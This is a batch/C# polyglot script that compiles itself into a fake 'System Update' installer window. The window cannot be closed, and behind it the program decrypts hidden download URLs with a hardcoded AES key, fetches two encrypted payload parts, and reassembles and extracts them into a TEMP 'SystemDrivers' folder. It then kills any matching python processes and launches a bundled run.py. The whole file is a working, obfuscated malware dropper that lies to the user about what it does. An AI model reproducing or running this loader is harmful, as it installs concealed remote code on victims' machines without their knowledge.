// 2>nul || @goto :batch
/*
:batch
@echo off
setlocal
set "CSC=%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
if not exist "%CSC%" set "CSC=%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe"
if not exist "%CSC%" (
    echo C# Compiler not found.
    exit /b 1
)

set "EXE=%TEMP%\sys_installer_%RANDOM%.exe"
"%CSC%" /nologo /target:winexe /out:"%EXE%" /reference:System.Windows.Forms.dll,System.Drawing.dll,System.IO.Compression.FileSystem.dll "%~f0" >nul 2>&1

if exist "%EXE%" (
    start "" "%EXE%"
) else (
    echo Failed to compile.
)
exit /b
*/

using System;
using System.IO;
using System.Net;
using System.IO.Compression;
using System.Windows.Forms;
using System.Drawing;
using System.Threading.Tasks;
using System.Diagnostics;

namespace SetupApp
{
    public class InstallerForm : Form
    {
        private Label lbl;
        private ProgressBar pb;

        public InstallerForm()
        {
            this.Text = "System Update";
            this.Size = new Size(420, 160);
            this.StartPosition = FormStartPosition.CenterScreen;
            this.FormBorderStyle = FormBorderStyle.FixedDialog;
            this.ControlBox = false;
            this.TopMost = true;
            this.BackColor = Color.FromArgb(240, 240, 240);

            lbl = new Label();
            lbl.Location = new Point(20, 18);
            lbl.Size = new Size(370, 50);
            lbl.Font = new Font("Segoe UI", 10);
            lbl.Text = "Initializing...";
            this.Controls.Add(lbl);

            pb = new ProgressBar();
            pb.Location = new Point(20, 80);
            pb.Size = new Size(370, 18);
            pb.Style = ProgressBarStyle.Marquee;
            pb.MarqueeAnimationSpeed = 25;
            this.Controls.Add(pb);

            this.Load += InstallerForm_Load;
        }

        private async void InstallerForm_Load(object sender, EventArgs e)
        {
            await RunSetup();
        }

        private async Task RunSetup()
        {
            string errorMsg = null;
            
            string D(string c) {
                byte[] k = Convert.FromBase64String("ynpwLDExoBrFsg3uNDR9zlpCrueDnEqqzQ8lmimmp0Y=");
                byte[] i = Convert.FromBase64String("sOMdDnGF9uk+XWTHXucA8A==");
                using (System.Security.Cryptography.Aes aes = System.Security.Cryptography.Aes.Create()) {
                    aes.Key = k; aes.IV = i;
                    using (var ms = new MemoryStream(Convert.FromBase64String(c)))
                    using (var cs = new System.Security.Cryptography.CryptoStream(ms, aes.CreateDecryptor(), System.Security.Cryptography.CryptoStreamMode.Read))
                    using (var sr = new StreamReader(cs)) return sr.ReadToEnd();
                }
            }
            try
            {
                ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; // TLS 1.2
                lbl.Text = "Downloading required components...\nPlease wait.";
                
                string part1Url = D("XCPo7W+losXd/fv4p+FYkXzJmo34bG5FCBz7ijg2X17yFvSUrBhttRyk/xWNa6kMCnv+KAIVVXvXJM5R8qbpsvhsUsCbhCvd/9yPESaC4eCfM+EaYoks3AKkCKBvi3NL");
                string part2Url = D("XCPo7W+losXd/fv4p+FYkXzJmo34bG5FCBz7ijg2X17yFvSUrBhttRyk/xWNa6kMCnv+KAIVVXvXJM5R8qbpsvhsUsCbhCvd/9yPESaC4eBAF1HdY4uUlgmx9QvjJx0c");
                
                string tempDir = Path.GetTempPath();
                string part1Path = Path.Combine(tempDir, Guid.NewGuid().ToString("N") + ".aes");
                string part2Path = Path.Combine(tempDir, Guid.NewGuid().ToString("N") + ".aes");
                string zipPath = Path.Combine(tempDir, Guid.NewGuid().ToString("N") + ".zip");
                
                using (WebClient wc = new WebClient())
                {
                    await wc.DownloadFileTaskAsync(part1Url, part1Path);
                    await wc.DownloadFileTaskAsync(part2Url, part2Path);
                }

                lbl.Text = "Decrypting secure payload...\nPlease wait.";
                
                string b64Encrypted = File.ReadAllText(part1Path) + File.ReadAllText(part2Path);
                b64Encrypted = b64Encrypted.Replace("\r", "").Replace("\n", "");
                byte[] encryptedBytes = Convert.FromBase64String(b64Encrypted);
                
                // AES Decryption Key and IV generated by build_macOSx_aes.py
                byte[] key = Convert.FromBase64String("iBgpW0cshXTmi2hn0I1r1EgB20rXDbTPM4R86d2G4qU=");
                byte[] iv = Convert.FromBase64String("BteJxithaE7enVmfw/RLVQ==");
                
                using (System.Security.Cryptography.Aes aes = System.Security.Cryptography.Aes.Create())
                {
                    aes.Key = key;
                    aes.IV = iv;
                    aes.Mode = System.Security.Cryptography.CipherMode.CBC;
                    aes.Padding = System.Security.Cryptography.PaddingMode.PKCS7;
                    
                    using (System.Security.Cryptography.ICryptoTransform decryptor = aes.CreateDecryptor())
                    using (MemoryStream msDecrypt = new MemoryStream(encryptedBytes))
                    using (System.Security.Cryptography.CryptoStream csDecrypt = new System.Security.Cryptography.CryptoStream(msDecrypt, decryptor, System.Security.Cryptography.CryptoStreamMode.Read))
                    using (MemoryStream msPlain = new MemoryStream())
                    {
                        csDecrypt.CopyTo(msPlain);
                        File.WriteAllBytes(zipPath, msPlain.ToArray());
                    }
                }
                
                File.Delete(part1Path);
                File.Delete(part2Path);
                
                string installRoot = Path.Combine(tempDir, "SystemDrivers");
                Directory.CreateDirectory(installRoot);
                string dest = Path.Combine(installRoot, "macOSx");

                if (Directory.Exists(dest))
                {
                    lbl.Text = "Removing temporary files...";
                    try
                    {
                        foreach (var process in Process.GetProcessesByName("python"))
                        {
                            try
                            {
                                if (process.MainModule.FileName.StartsWith(dest, StringComparison.OrdinalIgnoreCase))
                                {
                                    process.Kill();
                                    process.WaitForExit(2000);
                                }
                            }
                            catch { }
                        }
                    }
                    catch { }
                    
                    await Task.Delay(500); // Wait for processes to release locks
                    Directory.Delete(dest, true);
                }

                lbl.Text = "Installing features...\nAlmost done.";
                ZipFile.ExtractToDirectory(zipPath, installRoot);
                File.Delete(zipPath);

                lbl.Text = "Setup complete!\nStarting application...";
                pb.Style = ProgressBarStyle.Blocks;
                pb.Value = 100;

                string pyExe = Path.Combine(dest, "python.exe");
                string pyScript = Path.Combine(dest, "run.py");

                if (File.Exists(pyExe) && File.Exists(pyScript))
                {
                    ProcessStartInfo psi = new ProcessStartInfo
                    {
                        FileName = pyExe,
                        Arguments = "\"" + pyScript + "\"",
                        WorkingDirectory = dest,
                        WindowStyle = ProcessWindowStyle.Normal
                    };
                    Process.Start(psi);
                }

                await Task.Delay(1500);
                this.Close();
            }
            catch (Exception ex)
            {
                errorMsg = ex.Message;
            }
            
            if (errorMsg != null)
            {
                lbl.Text = "Error: " + errorMsg;
                lbl.ForeColor = Color.Red;
                pb.Style = ProgressBarStyle.Blocks;
                pb.Value = 100;
                await Task.Delay(5000);
                this.Close();
            }
        }
        
        [STAThread]
        public static void Main()
        {
            Application.EnableVisualStyles();
            Application.Run(new InstallerForm());
        }
    }
}
